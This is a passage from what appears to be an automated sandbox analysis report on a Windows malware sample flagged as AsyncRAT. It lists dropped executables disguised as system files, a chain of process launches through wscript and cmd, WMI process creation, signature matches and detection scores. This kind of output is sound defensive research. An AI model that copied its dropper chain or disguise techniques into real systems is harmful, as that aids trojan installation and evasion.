                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF722C4803_2_00007FFDF722C480
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF72172C53_2_00007FFDF72172C5
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF72121443_2_00007FFDF7212144
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF72169E73_2_00007FFDF72169E7
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF72C04403_2_00007FFDF72C0440
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7212C7A3_2_00007FFDF7212C7A
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7215B143_2_00007FFDF7215B14
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF73B41703_2_00007FFDF73B4170
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF72141063_2_00007FFDF7214106
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7215B783_2_00007FFDF7215B78
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7213FDF3_2_00007FFDF7213FDF
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF721655F3_2_00007FFDF721655F
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7216A873_2_00007FFDF7216A87
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7211F9B3_2_00007FFDF7211F9B
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF72121BC3_2_00007FFDF72121BC
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7216F283_2_00007FFDF7216F28
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF72160A03_2_00007FFDF72160A0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7450E003_2_00007FFDF7450E00
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7593B103_2_00007FFDF7593B10
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF76029703_2_00007FFDF7602970
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF762E8A03_2_00007FFDF762E8A0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF75A08603_2_00007FFDF75A0860
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF75BB8703_2_00007FFDF75BB870
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF75969023_2_00007FFDF7596902
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF75D69003_2_00007FFDF75D6900
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDFB8998A03_2_00007FFDFB8998A0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFE1024A0783_2_00007FFE1024A078
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFE102489583_2_00007FFE10248958
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFE10249A383_2_00007FFE10249A38
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFE1026BA603_2_00007FFE1026BA60
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFE102496403_2_00007FFE10249640
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeCode function: 6_2_00007FFD9B2A16796_2_00007FFD9B2A1679
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeCode function: 6_2_00007FFD9B2AA6626_2_00007FFD9B2AA662
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeCode function: 6_2_00007FFD9B2A98B66_2_00007FFD9B2A98B6
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeCode function: 6_2_00007FFD9B2A204D6_2_00007FFD9B2A204D
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeCode function: 6_2_00007FFD9B2A16B96_2_00007FFD9B2A16B9
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeCode function: 6_2_00007FFD9B2A00AD6_2_00007FFD9B2A00AD
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeCode function: 6_2_00007FFD9B2A62A86_2_00007FFD9B2A62A8
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeCode function: 6_2_00007FFD9B2A0EFA6_2_00007FFD9B2A0EFA
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeCode function: 7_2_00AD08907_2_00AD0890
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeCode function: 7_2_00AD08807_2_00AD0880
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B2900AD17_2_00007FFD9B2900AD
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B36302717_2_00007FFD9B363027
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9B2C00AD21_2_00007FFD9B2C00AD
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9B3930E921_2_00007FFD9B3930E9
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: String function: 00007FFDF721405C appears 123 times
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: String function: 00007FF76D5C25F0 appears 100 times
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: String function: 00007FFDF7211EF6 appears 255 times
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: String function: 00007FFDF7212739 appears 69 times
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: String function: 00007FFDF75994C0 appears 36 times
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: String function: 00007FF76D5C2760 appears 36 times
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: String function: 00007FFDF71512EE appears 325 times
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: String function: 00007FFDF71BDFBF appears 126 times
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: String function: 00007FFDF71BE055 appears 52 times
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: String function: 002AE28C appears 35 times
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: String function: 002AED00 appears 31 times
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: String function: 002AE360 appears 52 times
                        Source: Vjy8d2EoqK.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
                        Source: Vjy8d2EoqK.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                        Source: Vjy8d2EoqK.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                        Source: S l r .exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Source: S l r .exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Source: rar.exe.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                        Source: Vjy8d2EoqK.exe, 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs Vjy8d2EoqK.exe
                        Source: Vjy8d2EoqK.exe, 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs Vjy8d2EoqK.exe
                        Source: Vjy8d2EoqK.exe, 00000000.00000003.1694720616.0000000002A1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs Vjy8d2EoqK.exe
                        Source: Vjy8d2EoqK.exeBinary or memory string: OriginalFilenameOOBE-Maintenance.exej% vs Vjy8d2EoqK.exe
                        Source: Vjy8d2EoqK.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                        Source: Vjy8d2EoqK.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 4.0.S l r .exe.409294.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 4.3.S l r .exe.569e78.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 4.0.S l r .exe.409294.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 4.3.S l r .exe.569e78.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 6.0.XClient.exe.d70000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.3.Vjy8d2EoqK.exe.e8fa8c.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 4.0.S l r .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.0.Vjy8d2EoqK.exe.adfe9c.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.0.Vjy8d2EoqK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.0.Vjy8d2EoqK.exe.40936c.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000004.00000003.1709553123.000000000055D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000000.00000000.1682604318.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000006.00000000.1709097022.0000000000D72000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: libcrypto-1_1.dll.1.drStatic PE information: Section: UPX1 ZLIB complexity 0.9983946492448331
                        Source: libssl-1_1.dll.1.drStatic PE information: Section: UPX1 ZLIB complexity 0.9922997485632183
                        Source: python311.dll.1.drStatic PE information: Section: UPX1 ZLIB complexity 0.9994449334898279
                        Source: sqlite3.dll.1.drStatic PE information: Section: UPX1 ZLIB complexity 0.99775382299659
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, GHDOQSOKt60AmXixKaY.csCryptographic APIs: 'TransformBlock'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, GHDOQSOKt60AmXixKaY.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, JrCZwsIvjVF3h1G2N1o.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, JrCZwsIvjVF3h1G2N1o.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, 8MkYr80s4fTZIpKxrpgZ9Q.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, NlOekkeE5O7s901dhU6uz3.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, NlOekkeE5O7s901dhU6uz3.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, 8MkYr80s4fTZIpKxrpgZ9Q.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, NlOekkeE5O7s901dhU6uz3.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, NlOekkeE5O7s901dhU6uz3.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, GHDOQSOKt60AmXixKaY.csCryptographic APIs: 'TransformBlock'
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, GHDOQSOKt60AmXixKaY.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, csnL8AtkWHZty2lLwdG.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, csnL8AtkWHZty2lLwdG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, csnL8AtkWHZty2lLwdG.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, csnL8AtkWHZty2lLwdG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, QbAVq6ouVDIWQ3nHKWiYDo.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, QbAVq6ouVDIWQ3nHKWiYDo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, QbAVq6ouVDIWQ3nHKWiYDo.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, QbAVq6ouVDIWQ3nHKWiYDo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.evad.winEXE@124/73@7/5
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5C29E0 GetLastError,FormatMessageW,MessageBoxW,1_2_00007FF76D5C29E0
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002A9E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,2_2_002A9E1C
                        Source: C:\Brokercrt\comReviewsession.exeFile created: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile created: C:\Users\user\AppData\Roaming\XClient.exe
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7264:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
                        Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeMutant created: \Sessions\1\BaseNamedObjects\b
                        Source: C:\Brokercrt\comReviewsession.exeMutant created: \Sessions\1\BaseNamedObjects\Local\188035234b6efcd4125799b36dad9dd497004c0f
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeMutant created: \Sessions\1\BaseNamedObjects\9oIQHybA1LjAiymG
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeFile created: C:\Users\user\AppData\Local\Temp\Built.exeJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Brokercrt\oqZ1ERFvWaUzYBP9Lou79Kq.bat" "
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCommand line argument: sfxname2_2_002AD5D4
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCommand line argument: sfxstime2_2_002AD5D4
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCommand line argument: STARTDLG2_2_002AD5D4
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCommand line argument: xj.2_2_002AD5D4
                        Source: Vjy8d2EoqK.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Brokercrt\comReviewsession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: Built.exe, 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: Built.exe, Built.exe, 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: Built.exe, Built.exe, 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: Built.exe, Built.exe, 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: Built.exe, Built.exe, 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: Built.exe, Built.exe, 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: Built.exe, Built.exe, 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: Vjy8d2EoqK.exeReversingLabs: Detection: 92%
                        Source: Vjy8d2EoqK.exeVirustotal: Detection: 84%
                        Source: Built.exeString found in binary or memory: id-cmc-addExtensions
                        Source: Built.exeString found in binary or memory: set-addPolicy
                        Source: Built.exeString found in binary or memory: can't send non-None value to a just-started generator
                        Source: Built.exeString found in binary or memory: --help
                        Source: Built.exeString found in binary or memory: --help
                        Source: Built.exeString found in binary or memory: command-line parameters (see --help for details): PYTHONDEBUG : enable parser debug mode (-d) PYTHONDONTWRITEBYTECODE : don't write .pyc files (-B) PYTHONINSPECT : inspect interactively after running script (-i) PYTHONINTMAXSTRDIGITS :
                        Source: Built.exeString found in binary or memory: command-line parameters (see --help for details): PYTHONDEBUG : enable parser debug mode (-d) PYTHONDONTWRITEBYTECODE : don't write .pyc files (-B) PYTHONINSPECT : inspect interactively after running script (-i) PYTHONINTMAXSTRDIGITS :
                        Source: unknownProcess created: C:\Users\user\Desktop\Vjy8d2EoqK.exe "C:\Users\user\Desktop\Vjy8d2EoqK.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeProcess created: C:\Users\user\AppData\Local\Temp\svchosts.exe "C:\Users\user\AppData\Local\Temp\svchosts.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeProcess created: C:\Users\user\AppData\Local\Temp\S l r .exe "C:\Users\user\AppData\Local\Temp\S l r .exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe"
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeProcess created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"
